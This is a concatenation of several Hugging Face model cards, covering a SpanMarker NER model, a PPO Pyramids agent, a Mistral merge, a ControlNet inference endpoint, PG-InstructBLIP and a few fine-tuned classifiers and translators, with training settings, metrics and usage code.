- text: Inductively Coupled Plasma - Mass Spectrometry ( ICP - MS ) analysis of Longcliffe
SP52 limestone was undertaken to identify other impurities present , and the effect
of sorbent mass and SO2 concentration on elemental partitioning in the carbonator
between solid sorbent and gaseous phase was investigated , using a bubbler sampling
system .
- text: We extensively evaluate our work against benchmark and competitive protocols
across a range of metrics over three real connectivity and GPS traces such as
Sassy [ 44 ] , San Francisco Cabs [ 45 ] and Infocom 2006 [ 33 ] .
- text: In this research , we developed a robust two - layer classifier that can accurately
classify normal hearing ( NH ) from hearing impaired ( HI ) infants with congenital
sensori - neural hearing loss ( SNHL ) based on their Magnetic Resonance ( MR
) images .
- text: In situ Peak Force Tapping AFM was employed for determining morphology and
nano - mechanical properties of the surface layer .
- text: By means of a criterion of Gilmer for polynomially dense subsets of the ring
of integers of a number field , we show that , if h∈K[X ] maps every element of
OK of degree n to an algebraic integer , then h(X ) is integral - valued over
OK , that is , h(OK)⊂OK .
pipeline_tag: token-classification
base_model: roberta-large
model-index:
- name: SpanMarker with roberta-large on my-data
results:
- task:
type: token-classification
name: Named Entity Recognition
dataset:
name: my-data
type: unknown
split: test
metrics:
- type: f1
value: 0.7147595356550579
name: F1
- type: precision
value: 0.7292724196277496
name: Precision
- type: recall
value: 0.7008130081300813
name: Recall
---
# SpanMarker with roberta-large on my-data
This is a [SpanMarker](https://github.com/tomaarsen/SpanMarkerNER) model that can be used for Named Entity Recognition. This SpanMarker model uses [roberta-large](https://huggingface.co/roberta-large) as the underlying encoder.
## Model Details
### Model Description
- **Model Type:** SpanMarker
- **Encoder:** [roberta-large](https://huggingface.co/roberta-large)
- **Maximum Sequence Length:** 256 tokens
- **Maximum Entity Length:** 8 words
<!-- - **Training Dataset:** [Unknown](https://huggingface.co/datasets/unknown) -->
- **Language:** en
- **License:** cc-by-sa-4.0
### Model Sources
- **Repository:** [SpanMarker on GitHub](https://github.com/tomaarsen/SpanMarkerNER)
- **Thesis:** [SpanMarker For Named Entity Recognition](https://raw.githubusercontent.com/tomaarsen/SpanMarkerNER/main/thesis.pdf)
### Model Labels
| Label | Examples |
|:---------|:--------------------------------------------------------------------------------------------------------|
| Data | "Depth time - series", "an overall mitochondrial", "defect" |
| Material | "cross - shore measurement locations", "the subject 's fibroblasts", "COXI , COXII and COXIII subunits" |
| Method | "an approximation", "in vitro", "EFSA" |
| Process | "intake", "translation", "a significant reduction of synthesis" |
## Evaluation
### Metrics
| Label | Precision | Recall | F1 |
|:---------|:----------|:-------|:-------|
| **all** | 0.7293 | 0.7008 | 0.7148 |
| Data | 0.6583 | 0.6931 | 0.6753 |
| Material | 0.8141 | 0.8060 | 0.8100 |
| Method | 0.5556 | 0.5 | 0.5263 |
| Process | 0.7314 | 0.6244 | 0.6737 |
## Uses
### Direct Use for Inference
```python
from span_marker import SpanMarkerModel
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span_marker_model_id")
# Run inference
entities = model.predict("In situ Peak Force Tapping AFM was employed for determining morphology and nano - mechanical properties of the surface layer .")
```
### Downstream Use
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
```python
from datasets import load_dataset
from span_marker import SpanMarkerModel, Trainer
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span_marker_model_id")
# Specify a Dataset with "tokens" and "ner_tag" columns
dataset = load_dataset("conll2003") # For example CoNLL2003
# Initialize a Trainer using the pretrained model & dataset
trainer = Trainer(
model=model,
train_dataset=dataset["train"],
eval_dataset=dataset["validation"],
)
trainer.train()
trainer.save_model("span_marker_model_id-finetuned")
```
</details>
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Set Metrics
| Training set | Min | Median | Max |
|:----------------------|:----|:--------|:----|
| Sentence length | 3 | 25.6049 | 106 |
| Entities per sentence | 0 | 5.2439 | 22 |
### Training Hyperparameters
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 10
### Training Results
| Epoch | Step | Validation Loss | Validation Precision | Validation Recall | Validation F1 | Validation Accuracy |
|:------:|:----:|:---------------:|:--------------------:|:-----------------:|:-------------:|:-------------------:|
| 2.0134 | 300 | 0.0544 | 0.6819 | 0.6260 | 0.6527 | 0.8016 |
| 4.0268 | 600 | 0.0525 | 0.7217 | 0.7176 | 0.7196 | 0.8387 |
| 6.0403 | 900 | 0.0688 | 0.7652 | 0.7214 | 0.7426 | 0.8459 |
| 8.0537 | 1200 | 0.0703 | 0.7636 | 0.7214 | 0.7419 | 0.8349 |
### Framework Versions
- Python: 3.10.12
- SpanMarker: 1.5.0
- Transformers: 4.36.2
- PyTorch: 2.0.1+cu118
- Datasets: 2.16.1
- Tokenizers: 0.15.0
## Citation
### BibTeX
```
@software{Aarsen_SpanMarker,
author = {Aarsen, Tom},
license = {Apache-2.0},
title = {{SpanMarker for Named Entity Recognition}},
url = {https://github.com/tomaarsen/SpanMarkerNER}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
homerquan/ppo-PyramidsRND | homerquan | 2024-01-22T01:57:37Z | 1 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"Pyramids",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-Pyramids",
"region:us"
] | reinforcement-learning | 2024-01-22T01:57:21Z | ---
library_name: ml-agents
tags:
- Pyramids
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-Pyramids
---
# **ppo** Agent playing **Pyramids**
This is a trained model of a **ppo** agent playing **Pyramids**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how ML-Agents works:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Find your model_id: homerquan/ppo-PyramidsRND
3. Select your *.nn / *.onnx file
4. Click on Watch the agent play 👀
|
ND911/EE-Silicon-Maid-7B | ND911 | 2024-01-22T01:53:41Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"merge",
"mergekit",
"lazymergekit",
"SanjiWatsuki/Silicon-Maid-7B",
"SanjiWatsuki/Loyal-Macaroni-Maid-7B",
"base_model:SanjiWatsuki/Loyal-Macaroni-Maid-7B",
"base_model:merge:SanjiWatsuki/Loyal-Macaroni-Maid-7B",
"base_model:SanjiWatsuki/Silicon-Maid-7B",
"base_model:merge:SanjiWatsuki/Silicon-Maid-7B",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-22T00:17:17Z | ---
tags:
- merge
- mergekit
- lazymergekit
- SanjiWatsuki/Silicon-Maid-7B
- SanjiWatsuki/Loyal-Macaroni-Maid-7B
base_model:
- SanjiWatsuki/Silicon-Maid-7B
- SanjiWatsuki/Loyal-Macaroni-Maid-7B
---
# EE-Silicon-Maid-7B
EE-Silicon-Maid-7B is a SLERP merge of the following models using [LazyMergekit](https://colab.research.google.com/drive/1obulZ1ROXHjYLn6PPZJwRR6GzgQogxxb?usp=sharing):
* [SanjiWatsuki/Silicon-Maid-7B](https://huggingface.co/SanjiWatsuki/Silicon-Maid-7B)
* [SanjiWatsuki/Loyal-Macaroni-Maid-7B](https://huggingface.co/SanjiWatsuki/Loyal-Macaroni-Maid-7B)
## 🧩 Configuration
```yaml
slices:
- sources:
- model: SanjiWatsuki/Silicon-Maid-7B
layer_range: [0, 32]
- model: SanjiWatsuki/Loyal-Macaroni-Maid-7B
layer_range: [0, 32]
merge_method: slerp
base_model: SanjiWatsuki/Silicon-Maid-7B
parameters:
t:
- filter: self_attn
value: [0, 0.5, 0.3, 0.7, 1]
- filter: mlp
value: [1, 0.5, 0.7, 0.3, 0]
- value: 0.5
dtype: bfloat16
```
## 💻 Usage
```python
!pip install -qU transformers accelerate
from transformers import AutoTokenizer
import transformers
import torch
model = "ND911/EE-Silicon-Maid-7B"
messages = [{"role": "user", "content": "What is a large language model?"}]
tokenizer = AutoTokenizer.from_pretrained(model)
prompt = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
pipeline = transformers.pipeline(
"text-generation",
model=model,
torch_dtype=torch.float16,
device_map="auto",
)
outputs = pipeline(prompt, max_new_tokens=256, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
print(outputs[0]["generated_text"])
``` |
CLMBR/binding-domain-transformer-3 | CLMBR | 2024-01-22T01:48:28Z | 12 | 0 | transformers | [
"transformers",
"pytorch",
"opt",
"text-generation",
"generated_from_trainer",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-17T22:41:58Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-domain-transformer-3
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-domain-transformer-3
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.8650
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 3
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.2244 | 0.03 | 76320 | 4.1909 |
| 4.0211 | 1.03 | 152640 | 4.0229 |
| 3.9159 | 0.03 | 228960 | 3.9493 |
| 3.8498 | 1.03 | 305280 | 3.9090 |
| 3.7991 | 0.03 | 381600 | 3.8841 |
| 3.7593 | 1.03 | 457920 | 3.8685 |
| 3.723 | 0.03 | 534240 | 3.8588 |
| 3.6924 | 1.03 | 610560 | 3.8515 |
| 3.6614 | 0.03 | 686880 | 3.8478 |
| 3.6384 | 1.03 | 763200 | 3.8438 |
| 3.615 | 0.03 | 839520 | 3.8439 |
| 3.5978 | 0.03 | 915840 | 3.8436 |
| 3.5793 | 1.03 | 992160 | 3.8439 |
| 3.5562 | 0.03 | 1068480 | 3.8438 |
| 3.5417 | 1.03 | 1144800 | 3.8447 |
| 3.5316 | 0.03 | 1221120 | 3.8448 |
| 3.5118 | 1.03 | 1297440 | 3.8462 |
| 3.4988 | 0.03 | 1373760 | 3.8479 |
| 3.487 | 1.03 | 1450080 | 3.8496 |
| 3.479 | 0.03 | 1526400 | 3.8513 |
| 3.4692 | 1.03 | 1602720 | 3.8529 |
| 3.461 | 0.03 | 1679040 | 3.8545 |
| 3.451 | 1.03 | 1755360 | 3.8554 |
| 3.4373 | 0.03 | 1831680 | 3.8589 |
| 3.4255 | 1.03 | 1908000 | 3.8589 |
| 3.4134 | 0.03 | 1984320 | 3.8601 |
| 3.4011 | 1.03 | 2060640 | 3.8621 |
| 3.3925 | 0.03 | 2136960 | 3.8635 |
| 3.3812 | 1.03 | 2213280 | 3.8640 |
| 3.37 | 0.03 | 2289600 | 3.8647 |
| 3.3613 | 1.03 | 2365920 | 3.8655 |
| 3.3524 | 0.03 | 2442240 | 3.8670 |
| 3.3382 | 1.03 | 2518560 | 3.8679 |
| 3.3299 | 0.03 | 2594880 | 3.8672 |
| 3.3211 | 1.03 | 2671200 | 3.8679 |
| 3.3176 | 0.03 | 2747520 | 3.8677 |
| 3.3103 | 1.03 | 2823840 | 3.8677 |
| 3.3062 | 0.03 | 2900160 | 3.8672 |
| 3.2996 | 1.03 | 2976480 | 3.8662 |
| 3.291 | 0.02 | 3052726 | 3.8650 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
rezaFarsh/binary_persian_sentiment_analysis | rezaFarsh | 2024-01-22T01:46:59Z | 8 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"base_model:sentence-transformers/LaBSE",
"base_model:finetune:sentence-transformers/LaBSE",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-21T12:47:03Z | ---
license: apache-2.0
base_model: sentence-transformers/LaBSE
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: binary_persian_sentiment_analysis
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binary_persian_sentiment_analysis
This model is a fine-tuned version of [sentence-transformers/LaBSE](https://huggingface.co/sentence-transformers/LaBSE) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.5060
- Accuracy: 0.8805
- F1 Score: 0.8805
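A minimal, hypothetical inference sketch (the model id comes from this repository; the example sentence is illustrative, and the label names and their mapping are not documented here):
```python
from transformers import pipeline

# Hypothetical usage sketch: binary Persian sentiment classification.
# The returned labels (e.g. LABEL_0 / LABEL_1) and their mapping to
# negative/positive should be verified against the model config.
classifier = pipeline(
    "text-classification",
    model="rezaFarsh/binary_persian_sentiment_analysis",
)
print(classifier("این فیلم فوق‌العاده بود"))  # "This movie was great" (illustrative input)
```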
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 20
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 Score |
|:-------------:|:-----:|:------:|:---------------:|:--------:|:--------:|
| 0.5045 | 1.0 | 8359 | 0.5295 | 0.8816 | 0.8814 |
| 0.4211 | 2.0 | 16718 | 0.6029 | 0.8837 | 0.8837 |
| 0.3501 | 3.0 | 25077 | 0.5060 | 0.8805 | 0.8805 |
| 0.2541 | 4.0 | 33436 | 0.7740 | 0.8762 | 0.8762 |
| 0.2065 | 5.0 | 41795 | 0.8071 | 0.8746 | 0.8745 |
| 0.1915 | 6.0 | 50154 | 0.8341 | 0.8805 | 0.8805 |
| 0.137 | 7.0 | 58513 | 0.9235 | 0.8644 | 0.8644 |
| 0.0605 | 8.0 | 66872 | 0.9695 | 0.8584 | 0.8584 |
| 0.0405 | 9.0 | 75231 | 1.0090 | 0.8751 | 0.8751 |
| 0.0712 | 10.0 | 83590 | 1.0134 | 0.8767 | 0.8767 |
| 0.0295 | 11.0 | 91949 | 1.0266 | 0.8708 | 0.8709 |
| 0.0704 | 12.0 | 100308 | 0.9940 | 0.8767 | 0.8767 |
| 0.0233 | 13.0 | 108667 | 1.0747 | 0.8762 | 0.8762 |
| 0.0153 | 14.0 | 117026 | 1.0747 | 0.8741 | 0.8741 |
| 0.0245 | 15.0 | 125385 | 1.0027 | 0.8837 | 0.8837 |
| 0.0618 | 16.0 | 133744 | 0.9939 | 0.8778 | 0.8778 |
| 0.0087 | 17.0 | 142103 | 1.0448 | 0.8854 | 0.8853 |
| 0.0174 | 18.0 | 150462 | 1.0339 | 0.8837 | 0.8838 |
| 0.0185 | 19.0 | 158821 | 1.1171 | 0.8778 | 0.8778 |
| 0.0075 | 20.0 | 167180 | 1.1022 | 0.8827 | 0.8827 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
dagbs/TinyDolphin-2.8-1.1b-GGUF | dagbs | 2024-01-22T01:40:35Z | 14 | 3 | null | [
"gguf",
"en",
"dataset:cerebras/SlimPajama-627B",
"dataset:bigcode/starcoderdata",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2024-01-22T01:18:25Z | ---
license: apache-2.0
datasets:
- cerebras/SlimPajama-627B
- bigcode/starcoderdata
language:
- en
quantized_by: dagbs
---
# TinyDolphin 2.8-1.1B - GGUF
- Model organization: [Cognitive Computations](https://huggingface.co/cognitivecomputations)
- Original model: [cognitivecomputations/TinyDolphin-2.8-1.1b](https://huggingface.co/cognitivecomputations/TinyDolphin-2.8-1.1b)

|
Charles-Elena/ControlNet-endpoint-test | Charles-Elena | 2024-01-22T01:36:01Z | 0 | 0 | null | [
"stable-diffusion",
"stable-diffusion-diffusers",
"controlnet",
"endpoints-template",
"arxiv:2302.05543",
"license:openrail",
"endpoints_compatible",
"region:us"
] | null | 2024-01-20T05:53:22Z | ---
license: openrail
tags:
- stable-diffusion
- stable-diffusion-diffusers
- controlnet
- endpoints-template
thumbnail: "https://huggingface.co/philschmid/ControlNet-endpoint/resolve/main/thumbnail.png"
inference: true
---
# Inference Endpoint for [ControlNet](https://huggingface.co/lllyasviel/ControlNet) using [runwayml/stable-diffusion-v1-5](https://huggingface.co/runwayml/stable-diffusion-v1-5)
> ControlNet is a neural network structure to control diffusion models by adding extra conditions.
> Official repository: https://github.com/lllyasviel/ControlNet
---
Blog post: [Controlled text to image generation with Inference Endpoints]()
This repository implements a custom `handler` task for `controlled text-to-image` generation on 🤗 Inference Endpoints. The code for the customized pipeline is in the [handler.py](https://huggingface.co/philschmid/ControlNet-endpoint/blob/main/handler.py).
There is also a [notebook](https://huggingface.co/philschmid/ControlNet-endpoint/blob/main/create_handler.ipynb) included that shows how to create the `handler.py`.

### expected Request payload
```json
{
"inputs": "A prompt used for image generation",
"negative_prompt": "low res, bad anatomy, worst quality, low quality",
"controlnet_type": "depth",
"image" : "iVBORw0KGgoAAAANSUhEUgAAAgAAAAIACAIAAAB7GkOtAAAABGdBTUEAALGPC",
}
```
Supported `controlnet_type` values are: `canny_edge`, `pose`, `depth`, `scribble`, `segmentation`, `normal`, `hed`, `hough`.
Below is an example of how to run a request using Python and `requests`.
## Use Python to send requests
1. Get image
```
wget https://huggingface.co/datasets/diffusers/test-arrays/resolve/main/stable_diffusion_imgvar/input_image_vermeer.png
```
2. Use the following code to send a request to the endpoint
```python
import json
from typing import List
import requests as r
import base64
from PIL import Image
from io import BytesIO
ENDPOINT_URL = "" # your endpoint url
HF_TOKEN = "" # your huggingface token `hf_xxx`
# helper image utils
def encode_image(image_path):
with open(image_path, "rb") as i:
b64 = base64.b64encode(i.read())
return b64.decode("utf-8")
def predict(prompt, image, negative_prompt=None, controlnet_type = "normal"):
image = encode_image(image)
# prepare sample payload
request = {"inputs": prompt, "image": image, "negative_prompt": negative_prompt, "controlnet_type": controlnet_type}
# headers
headers = {
"Authorization": f"Bearer {HF_TOKEN}",
"Content-Type": "application/json",
"Accept": "image/png" # important to get an image back
}
response = r.post(ENDPOINT_URL, headers=headers, json=request)
if response.status_code != 200:
print(response.text)
raise Exception("Prediction failed")
img = Image.open(BytesIO(response.content))
return img
prediction = predict(
prompt = "cloudy sky background lush landscape house and green trees, RAW photo (high detailed skin:1.2), 8k uhd, dslr, soft lighting, high quality, film grain, Fujifilm XT3",
negative_prompt ="lowres, bad anatomy, worst quality, low quality, city, traffic",
controlnet_type = "hed",
image = "huggingface.png"
)
prediction.save("result.png")
```
Expected output:


[Adding Conditional Control to Text-to-Image Diffusion Models](https://arxiv.org/abs/2302.05543) by Lvmin Zhang and Maneesh Agrawala.
Using the pretrained models we can provide control images (for example, a depth map) to control Stable Diffusion text-to-image generation so that it follows the structure of the depth image and fills in the details.
The abstract of the paper is the following:
We present a neural network structure, ControlNet, to control pretrained large diffusion models to support additional input conditions. The ControlNet learns task-specific conditions in an end-to-end way, and the learning is robust even when the training dataset is small (< 50k). Moreover, training a ControlNet is as fast as fine-tuning a diffusion model, and the model can be trained on a personal device. Alternatively, if powerful computation clusters are available, the model can scale to large amounts (millions to billions) of data. We report that large diffusion models like Stable Diffusion can be augmented with ControlNets to enable conditional inputs like edge maps, segmentation maps, keypoints, etc. This may enrich the methods to control large diffusion models and further facilitate related applications. |
bidiptas/PG-InstructBLIP | bidiptas | 2024-01-22T01:21:57Z | 0 | 13 | null | [
"vision",
"image-captioning",
"image-to-text",
"en",
"arxiv:2309.02561",
"license:mit",
"region:us"
] | image-to-text | 2023-09-04T04:52:58Z | ---
language: en
license: mit
arxiv: 2309.02561
tags:
- vision
- image-captioning
pipeline_tag: image-to-text
---
# PG-InstructBLIP model
Finetuned version of InstructBLIP with Flan-T5-XXL as the language model. PG-InstructBLIP was introduced in the paper [Physically Grounded Vision-Language Models for Robotic Manipulation](https://iliad.stanford.edu/pg-vlm/) by Gao et al. ([arXiv](https://arxiv.org/abs/2309.02561)).
## Model description
PG-InstructBLIP is finetuned using the [PhysObjects dataset](https://drive.google.com/file/d/1ThZ7p_5BnMboK_QE13m1fPKa4WGdRcfC/view?usp=sharing), an object-centric dataset of 36.9K crowd-sourced and 417K automated physical concept annotations of common household objects. This fine-tuning improves its understanding of physical object concepts, by capturing human priors of these concepts from visual appearance.
## Example Usage and Installation
This model is designed to be used with the LAVIS library. Please install [salesforce-lavis](https://pypi.org/project/salesforce-lavis/) from source and download this model via git-lfs or a direct download.
After loading the model, you can disable the qformer text input to match the configuration we used for fine-tuning. However, the model still works well with it enabled, so we recommend that users experiment with both and choose the optimal configuration on a case-by-case basis.
Review the generate.py and test.py scripts provided in the Files tab for an example of using PG-InstructBLIP to determine the transparency of an opaque bowl.
```
import torch
from PIL import Image
from omegaconf import OmegaConf
from lavis.models import load_model, load_preprocess
from lavis.common.registry import registry
import requests
from generate import generate
url = "https://iliad.stanford.edu/pg-vlm/example_images/ceramic_bowl.jpg"
example_image = Image.open(requests.get(url, stream=True).raw).convert("RGB")
vlm = load_model(
name='blip2_t5_instruct',
model_type='flant5xxl',
checkpoint='pgvlm_weights.bin', # replace with location of downloaded weights
is_eval=True,
device="cuda" if torch.cuda.is_available() else "cpu"
)
vlm.qformer_text_input = False # Optionally disable qformer text
model_cls = registry.get_model_class('blip2_t5_instruct')
model_type = 'flant5xxl'
preprocess_cfg = OmegaConf.load(model_cls.default_config_path(model_type)).preprocess
vis_processors, _ = load_preprocess(preprocess_cfg)
processor = vis_processors["eval"]
question_samples = {
'prompt': 'Question: Classify this object as transparent, translucent, or opaque? Respond unknown if you are not sure. Short answer:',
'image': torch.stack([processor(example_image)], dim=0).to(vlm.device)
}
answers, scores = generate(vlm, question_samples, length_penalty=0, repetition_penalty=1, num_captions=3)
print(answers, scores)
# ['opaque', 'translucent', 'transparent'] tensor([-0.0373, -4.2404, -4.4436], device='cuda:0')
```
Note that the output of the generate function includes the log probabilities of each generation. For categorical properties (like material, transparency, and contents), these probabilities can be interpreted as confidences, as typical with VLMs. In the example above, PG-InstructBLIP is very confident that the ceramic bowl is opaque, which is true.
For continuous properties (like mass, fragility, and deformability), we recommend asking yes or no questions like "Is this object heavy?" and comparing the probabilities of the "yes" response between objects to determine which has a larger value.
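As an illustrative sketch only (reusing the `generate` helper and `processor` from the snippet above; the exact prompt wording and the assumption that a literal "yes" appears among the returned candidates are not part of the original release):
```
# Sketch: compare two objects on a continuous property via the "yes" log-probability.
def yes_logprob(image, question):
    samples = {
        'prompt': f'Question: {question} Respond yes or no. Short answer:',  # assumed wording
        'image': torch.stack([processor(image)], dim=0).to(vlm.device)
    }
    answers, scores = generate(vlm, samples, length_penalty=0, repetition_penalty=1, num_captions=3)
    # Score of the "yes" candidate if it was generated, otherwise -inf.
    return max((s.item() for a, s in zip(answers, scores) if a.strip().lower() == 'yes'),
               default=float('-inf'))

bowl_score = yes_logprob(example_image, 'Is this object heavy?')
# other_score = yes_logprob(other_image, 'Is this object heavy?')  # hypothetical second crop
# The image with the higher "yes" log-probability is predicted to be heavier.
```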
For best results, we also recommend cropping input images to focus on the object in question, because PG-InstructBLIP is fine-tuned on object-centric data.
|
AMead10/Paul-Rosolie-v0 | AMead10 | 2024-01-22T01:15:34Z | 7 | 0 | transformers | [
"transformers",
"safetensors",
"vits",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2024-01-18T05:22:32Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Floyd93/my_awesome_opus_books_model | Floyd93 | 2024-01-22T01:14:55Z | 4 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:google-t5/t5-small",
"base_model:finetune:google-t5/t5-small",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2024-01-07T15:55:47Z | ---
license: apache-2.0
base_model: t5-small
tags:
- generated_from_trainer
model-index:
- name: my_awesome_opus_books_model
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# my_awesome_opus_books_model
This model is a fine-tuned version of [t5-small](https://huggingface.co/t5-small) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 1
### Training results
| Training Loss | Epoch | Step | Validation Loss | Bleu | Gen Len |
|:-------------:|:-----:|:----:|:---------------:|:-------:|:-------:|
| No log | 1.0 | 1 | 0.7006 | 59.1006 | 19.0 |
